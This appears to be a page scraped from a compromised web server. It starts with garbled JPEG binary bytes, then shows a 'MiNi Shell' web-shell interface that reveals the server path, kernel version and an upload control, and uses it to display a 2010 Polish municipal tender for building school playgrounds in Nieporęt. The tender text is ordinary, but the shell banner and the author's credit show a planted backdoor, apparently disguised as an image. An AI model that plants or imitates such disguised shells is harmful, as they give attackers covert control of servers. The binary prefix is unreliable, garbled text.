JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100518/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100518/134564-N-2010.html

<p class="kh_header"><b>Nieporęt: Budowa placów zabaw przy Szkołach Podstawowych w Józefowie i Białobrzegach w ramach rządowego programu Radosna Szkoła.</b><br>
<b>Numer ogłoszenia: 134564 - 2010; data zamieszczenia: 18.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Nieporęt reprezentowana przez Wójta , Pl. Wolności 1, 05-126 Nieporęt, woj. mazowieckie, tel. 022 7670416, 7670442, faks 022 7670441.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nieporet.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa placów zabaw przy Szkołach Podstawowych w Józefowie i Białobrzegach w ramach rządowego programu Radosna Szkoła..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Kod ze Wspólnego Słownika Zamówień (CPV):
37535200-9 - Wyposażenie placów zabaw.
45112723-9 - Roboty w zakresie kształtowania placów zabaw.
2.Zamówienie obejmuje budowę placu zabaw przy Szkole Podstawowej w Józefowie oraz budowę placu zabaw przy Szkole Podstawowej w Białobrzegach w ramach rządowego programu Radosna Szkoła, zgodnie z obowiązującymi przepisami, w tym zgodnie z normą PN-EN 1176 i PN-EN 1177 oraz zgodnie z projektami zagospodarowania terenu stanowiącymi załącznik nr 8 do niniejszego SIWZ.
3.Budowa placu zabaw przy Szkole Podstawowej w Józefowie (tzw. duży plac zabaw o łącznej pow. 510,50m2) będzie polegała na:
1)dostawie i montażu urządzeń i elementów zabawowych i zagospodarowania terenu, w tym:
a)zestaw zabawowy składający się przynajmniej z: 
wieży bez dachu z podestem na wys. 1,40 mb (+-5%), 
pochyłej ścianki wspinaczkowej o wys. 1,40 mb (+-5%) umożliwiającej wejście na podest wieży, 
przeplotni linowej o wys. 2,80 mb (+-5%) połączonej w podestem wieży, 
przeplotni łukowej połączonej w podestem wieży, 
zjeżdżalni o wys. 1,40 mb (+-5%) połączonej z podestem wieży, 
drabinki poziomej o wymiarach 2,0 mb x 0,90 mb x 2,45 mb (+-5%),
zestaw do przewrotów o wys. 1,00 mb i 1,20 mb (+-5%). 
Nogi zestawu wykonane z profili stalowych pomalowanych kolorowym lakierem. Elementy wykonane z: płyt HDPE o gr. 9, 12 i 19 mm, sklejki wodoodpornej, rurek stalowych ocynkowanych, blachy nierdzewnej, lin polipropylenowych, plastikowych złączek, uchwytów z tworzywa opartego na żywicach. Kotwy stalowe ocynkowane osadzone w fundamencie betonowym B-15.
b)huśtawka ważka o dł. 3,00 mb (+-5%).
Belka z profilu stalowego pomalowana kolorowym lakierem. Uchwyt belki ze stali ocynkowanej. Kotwy stalowe ocynkowane osadzone w fundamencie betonowym B-15.
c)huśtawka wahadłowa podwójna.
Nogi huśtawki wykonane ze profili stalowych pomalowanych kolorowym lakierem. Belka łącząca nogi wykonana z profilu stalowego ocynkowanego. Łańcuch ocynkowany. Siedziska proste wykonane z lin polipropylenowych na oplocie stalowym, zawieszone na łożyskach samosmarujących. Kotwy stalowe ocynkowane osadzone w fundamencie betonowym B-15.
d)zestaw sprawnościowy typu pająk, składający się przynajmniej z:
rurek stalowych ocynkowanych i malowanych proszkowo, tworzących pochyłe drabinki, ramę gniazda i ramiona zakończone ruchomymi rurkami stalowymi wpuszczonymi w grunt,
 lin polipropylenowych na oplocie stalowym tworzących sieć przeplotni, drabinek i gniazdo.
Nogi zestawu wykonane z drewna konstrukcyjnego sosnowego klejonego 90-90mm, malowanego farbami impregnacyjno-dekoracyjnymi. Śruby maszynowe ocynkowane. Kotwy stalowe ocynkowane osadzone w fundamencie betonowym B-15.
e)zestaw zabawowy składający się przynajmniej z:
wieży z dachem z podestem na wys. 0,9 mb (+-5%),
schodów wejściowych na podest o wys. 0,9 mb (+-5%),
balkonu odchodzącego z podestu,
zjeżdżalni o wys. 0,9 mb (+-5%).
Nogi zestawu wykonane z profili stalowych pomalowanych kolorowym lakierem. Osłony boczne wykonane z płyt HDPE. Kotwy stalowe ocynkowane osadzone w fundamencie betonowym B-15.
f)ruchomy pomost - element ścieżki zdrowia o dł. 2,7 mb (+-5%).
Nogi pomostu i ruchoma belka wykonane z drewna konstrukcyjnego sosnowego 90-90mm, malowanego farbami impregnacyjno-dekoracyjnymi. Rama konstrukcji (łącząca nogi pomostu i ruchomą belkę) wykonana z rur stalowych ocynkowanych. Ruchoma belka zawieszona na linach polipropylenowych na oplocie stalowym.
Uwaga: przy każdym urządzeniu zabawowym powinny być umieszczone czytelne tablice informujące o możliwościach i sposobie wykorzystania danego urządzenia. 
g)regulamin placu zabaw określający m.in. zasady i warunki korzystania ze szkolnego placu zabaw wraz z informacjami zgodnymi wymogami rządowego programu Radosna Szkoła.
h)zestaw wieszaków na ubrania dla min. 20 dzieci,
i)ławki z oparciem - 2 szt. o dł. 1,6 mb.
Konstrukcja stalowa ocynkowana. Siedzisko i oparcie drewniane - drewno malowane środkami ochronnymi. Kotwy stalowe ocynkowane osadzone w fundamencie betonowym B-15.
j)kosz na śmieci o pojemności 50 litrów.

2)wykonaniu nawierzchni gumowej pod urządzenia zabawowe i ciągi komunikacyjne wraz z podbudową, w tym:
a)nawierzchnia gumowa, na której zostaną zainstalowane urządzenia zabawowe, o powierzchni ok. 208,28 m2. Kolor nawierzchni - pomarańczowy - PANTONE 152C, RAL: 2011-Tieforange lub zbliżony i zgodny z wymogami programu Radosna Szkoła.
b)nawierzchnia gumowa, przeznaczona pod komunikację, o powierzchni ok. 50,99 m2. Kolor nawierzchni - niebieski - PANTONE 540C, RAL: 5003 - Saphirblau lub zbliżony i zgodny z wymogami programu Radosna Szkoła.
Nawierzchnia gumowa wylewana amortyzująca upadek z wysokości do 2,4mb dla nawierzchni pod urządzenia zabawowe, typu np. SmartSoft 35 mm lub równoważny. Warstwa dolna o grubości 25 mm - mieszanka recyklingu SBR granulat frakcji 2-6 mm. SBR granulat to granulki na podstawie kauczuku styrenowo butadienowego. Warstwa wierzchnia o grubości 10 mm to kolorowany EPDM granulat frakcji 1-3,5 mm wykonany z plastrów kauczuku.
c)podbudowa i obrzeża nawierzchni - zgodnie z wymogami producenta nawierzchni. 


3)splantowaniu i obsianiu trawą terenów zielonych o powierzchni ok. 251,23 m2 w obrębie placu zabaw wraz z uporządkowaniem terenu przyległego, naruszonego w wyniku prac budowlano-montażowych prowadzonych przez wykonawcę.

4.Budowa placu zabaw przy Szkole Podstawowej w Białobrzegach  (tzw. mały plac zabaw o łącznej pow. 259,49m2) będzie polegała na:
1)dostawie i montażu urządzeń i elementów zabawowych i zagospodarowania terenu, w tym:
a)zestaw zabawowy składający się przynajmniej z: 
wieży bez dachu z podestem na wys. 1,40 mb (+-5%), 
pochyłej ścianki wspinaczkowej o wys. 1,40 mb (+-5%) umożliwiającej wejście na podest wieży, 
przeplotni linowej o wys. 2,80 mb (+-5%) połączonej w podestem wieży, 
przeplotni łukowej połączonej w podestem wieży, 
zjeżdżalni o wys. 1,40 mb (+-5%) połączonej z podestem wieży, 
drabinki poziomej o wymiarach 2,0 mb x 0,90 mb x 2,45 mb (+-5%),
zestaw do przewrotów o wys. 1,00 mb i 1,20 mb (+-5%). 
Nogi zestawu wykonane z drewna sosnowego klejonego malowanego kolorowymi farbami impregnacyjno-dekoracyjnymi. Elementy wykonane z: płyt HDPE o gr. 9, 12 i 19 mm, sklejki wodoodpornej, rurek stalowych ocynkowanych, blachy nierdzewnej, lin polipropylenowych, plastikowych złączek, uchwytów m.in. na ściance wspinaczkowej z tworzywa opartego na żywicach. Kotwy stalowe ocynkowane osadzone w fundamencie betonowym B-15.
b)huśtawka ważka o dł. 3,00 mb (+-5%).
Belka z drewna sosnowego klejonego malowanego kolorowymi farbami impregnacyjno-dekoracyjnymi. Uchwyt belki ze stali ocynkowanej. Kotwy stalowe ocynkowane osadzone w fundamencie betonowym B-15.
c)huśtawka wahadłowa podwójna.
Nogi huśtawki wykonane z drewna sosnowego klejonego malowanego kolorowymi farbami impregnacyjno-dekoracyjnymi. Belka łącząca nogi wykonana z profilu stalowego ocynkowanego. Łańcuch ocynkowany. Siedziska proste wykonane z lin polipropylenowych na oplocie stalowym, zawieszone na łożyskach samosmarujących. Kotwy stalowe ocynkowane osadzone w fundamencie betonowym B-15.
d)zestaw sprawnościowy typu sześciokąt wielofunkcyjny, o wys. 2,5 mb (+-5%), składający się przynajmniej z:
rurek stalowych ocynkowanych i malowanych proszkowo, tworzących tzw. rurę strażacką, zestawy do przewrotów i podciągania, uchwyty do podciągania,
ścianki wspinaczkowej wykonanej ze sklejki wodoodpornej.
Nogi zestawu wykonane z drewna konstrukcyjnego sosnowego klejonego 90-90mm, malowanego farbami impregnacyjno-dekoracyjnymi. Śruby maszynowe ocynkowane. Kotwy stalowe ocynkowane osadzone w fundamencie betonowym B-15.
Uwaga: przy każdym urządzeniu zabawowym powinny być umieszczone czytelne tablice informujące o możliwościach i sposobie wykorzystania danego urządzenia. 
e)regulamin placu zabaw określający m.in. zasady i warunki korzystania ze szkolnego placu zabaw wraz z informacjami zgodnymi wymogami rządowego programu Radosna Szkoła,
f)zestaw wieszaków na ubrania dla min. 20 dzieci,
g)ławki z oparciem - 2 szt. o dł. 1,6 mb.
Konstrukcja stalowa ocynkowana. Siedzisko i oparcie drewniane - drewno malowane środkami ochronnymi. Kotwy stalowe ocynkowane osadzone w fundamencie betonowym B-15.
h)kosz na śmieci o pojemności 50 litrów.

2)wykonaniu nawierzchni gumowej pod urządzenia zabawowe i ciągi komunikacyjne wraz z podbudową, w tym:
a)nawierzchnia gumowa, na której zostaną zainstalowane urządzenia zabawowe, o powierzchni ok. 124,22 m2. Kolor nawierzchni - pomarańczowy - PANTONE 152C, RAL: 2011-Tieforange lub zbliżony i zgodny z wymogami programu Radosna Szkoła.
b)nawierzchnia gumowa, przeznaczona pod komunikację, o powierzchni ok. 24,16 m2. Kolor nawierzchni - niebieski - PANTONE 540C, RAL: 5003 - Saphirblau lub zbliżony i zgodny z wymogami programu Radosna Szkoła.
Nawierzchnia gumowa wylewana amortyzująca upadek z wysokości do 2,4mb dla nawierzchni pod urządzenia zabawowe, typu np. SmartSoft 35 mm lub równoważny. Warstwa dolna o grubości 25 mm - mieszanka recyklingu SBR granulat frakcji 2-6 mm. SBR granulat to granulki na podstawie kauczuku styrenowo butadienowego. Warstwa wierzchnia o grubości 10 mm to kolorowany EPDM granulat frakcji 1-3,5 mm wykonany z plastrów kauczuku.
c)podbudowa i obrzeża nawierzchni - zgodnie z wymogami producenta nawierzchni.

3)splantowaniu i obsianiu trawą terenów zielonych o powierzchni ok. 111,11 m2 w obrębie placu zabaw wraz z uporządkowaniem terenu przyległego, naruszonego w wyniku prac budowlano-montażowych prowadzonych przez wykonawcę..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 45.11.27.23-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Warunkiem udziału w postępowaniu przetargowym jest wniesienie wadium w wysokości 8 000,- zł (słownie: osiem tysięcy złotych).
2.Wadium należy wnieść w jednej lub kilku następujących formach (art.45 ustawy):
1)pieniądzu,
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)gwarancjach bankowych,
4)gwarancjach ubezpieczeniowych,
5)poręczeniach udzielanych przez podmioty, o których mowa w art.  6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r.  o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.).
3.Wadium wniesione w pieniądzu należy wpłacić na konto Urzędu Gminy w Banku Spółdzielczym w Legionowie O/Nieporęt nr 25 8013 1029 2003 0003 7415 0002. Kopię dowodu wpłaty lub przelewu wadium na konto Zamawiającego należy dołączyć do oferty przetargowej.
4.Skuteczne wniesienie wadium w pieniądzu następuje z chwilą wpływu środków pieniężnych na rachunek bankowy, o którym mowa w ust. 3, przed upływem terminu składania ofert.
5.Dokumenty, o których mowa w ust. 2 pkt 2 - 5, muszą obejmować swym zakresem wszelkie roszczenia Zamawiającego z tytułu wystąpienia zdarzeń, o których mowa w art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych, przy czym: 
1)w przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, dokumenty te muszą obejmować swym zakresem wszelkie roszczenia Zamawiającego z tytułu związanych z postępowaniem o udzielenie zamówienia działań lub zaniechań każdego z nich,
2)dokumenty te będą zawierały klauzule zapłaty sumy wadialnej na rzecz zamawiającego bezwarunkowo i na pierwsze żądanie,
3)dokumenty te zostaną złożone w oryginale. 
6.Dokumenty, o których mowa w ust. 2 pkt 2 - 5, należy złożyć w siedzibie Zamawiającego przed upływem terminu składania ofert lub wraz z ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się, że w ciągu ostatnich 5 lat,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonywał co najmniej dwa place zabaw wraz z nawierzchnią i zagospodarowaniem terenu, o parametrach  porównywalnych do przedmiotu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min. 300 000 zł (słownie: trzysta tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie zgodnie z art. 22 ust. 1 ustawy PZP;
2. Oświadczenie, które części zamówienia Wykonawca zamierza zlecić podwykonawcom;
3. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewdencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
4. Kosztorys ofertowy według przedmiaru dostarczonego przez Zamawiającego, wypełniony metodą szczegółową lub uproszczoną, stanowiący podstawę określenia ofertowej kwoty wynagrodzenia ryczałtowego oraz bazę kosztowo - cenową stanowiącą podstawę do wyceny przedmiaru, z zastrzeżeniem że w kosztorysie ofertowym musi być uwzględniony koszt wszystkich materiałów przewidzianych w specyfikacji;
5. Rysunki i opisy techniczne oferowanych urządzeń oraz dane techniczne nawierzchni i podbudowy, umożliwiające stwierdzenie zgodności ich parametrów z niniejszą SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.nieporet.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Nieporęt
Pl. Wolności 1
05-126 Nieporęt
tel. (0-22) 767-04-05, 767-04-42, fax 767 - 04 - 41,
www.nieporet.pl
inwestycje@nieporet.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2010 godzina 09:00, miejsce: Ofertę należy złożyć w kancelarii Urzędu Gminy Nieporęt, pok. nr 9..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com